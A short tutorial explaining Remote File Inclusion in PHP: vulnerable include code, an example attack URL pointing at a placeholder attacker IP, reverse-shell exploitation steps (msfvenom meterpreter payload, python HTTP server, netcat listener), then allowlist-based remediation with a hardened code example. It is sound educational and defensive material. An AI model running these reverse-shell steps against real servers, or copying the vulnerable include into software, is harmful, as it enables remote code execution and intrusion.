tl;dr: Remote File Inclusion
What is it?
A web app takes user-controlled input (e.g. a URL query string parameter) and passes it to an include statement without validating it. The server then fetches and executes the remote file, which could be a reverse shell script or other malicious code.
May I see it?
Yes.
$incfile = $_REQUEST["file"];   // attacker-controlled value, taken straight from the request
include($incfile.".php");       // resolved and executed as PHP; a remote URL is accepted as-is
Here, the file parameter is taken from the query string and passed into an include statement. If the following request is made:
http://www.target.com/vuln_page.php?file=<attacker IP>/shell
the server will resolve it to:
<attacker IP>/shell.php
and will execute whatever PHP code the attacker’s script contains.
How can I exploit it?
So, the attacker could generate a PHP reverse shell payload like so:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php
host the payload
python -m http.server 443
set up a netcat listener
nc -lvnp <port>
and make the HTTP request above. If the server is vulnerable, it will connect to the attacker’s IP, fetch shell.php and execute it. Netcat will then catch the reverse shell.
How do I remediate it?
Create an allowlist of known, safe values for file inclusion and accept only those. You could map simple numerical inputs like 1 to faq.txt and then reject all other values.
Create a denylist of known disallowed values.
Employ a specific naming scheme and check all provided values against it. Guard against double extensions such as file.txt.php.
If feasible, use a jail or sandboxing strategy such as chroot() to limit the locations that the process can access.
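As an added example (not code from the original post), here is the vulnerable include from above beside an allowlisted replacement in PHP; the page map, the file names and the pages/ directory are assumptions:

```php
<?php
// Added example, not from the original post. The vulnerable include beside an
// allowlisted replacement; PAGE_MAP, the file names and $baseDir are assumptions.

// Vulnerable form, as on the page: the attacker controls the include path.
function include_unsafe(array $request): void
{
    $incfile = $request["file"];
    include($incfile . ".php");
}

// Hardened form: map opaque identifiers to known files and reject everything else.
const PAGE_MAP = [
    "1" => "faq.php",
    "2" => "contact.php",
    "3" => "about.php",
];

function resolve_page(string $id, string $baseDir): ?string
{
    if (!array_key_exists($id, PAGE_MAP)) {
        return null;                       // not on the allowlist: reject
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGE_MAP[$id]);
    // realpath() resolves symlinks and "..", so confirm the target still sits under $baseDir
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function include_safe(array $request, string $baseDir): void
{
    // Only a plain string may be used as a lookup key; arrays and missing values are rejected.
    $id = (isset($request["file"]) && is_string($request["file"])) ? $request["file"] : "";
    $path = resolve_page($id, $baseDir);
    if ($path === null) {
        http_response_code(400);
        echo "Unknown page";
        return;
    }
    include $path;
}

// Usage: include_safe($_REQUEST, __DIR__ . "/pages");
```

A value such as <attacker IP>/shell never reaches include() because the raw input is only used as a lookup key, and keeping allow_url_include=Off in php.ini (its default) stops include() from fetching URLs at all as a second layer.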
References & Further Reading
http://projects.webappsec.org/w/page/13246955/Remote%20File%20Inclusion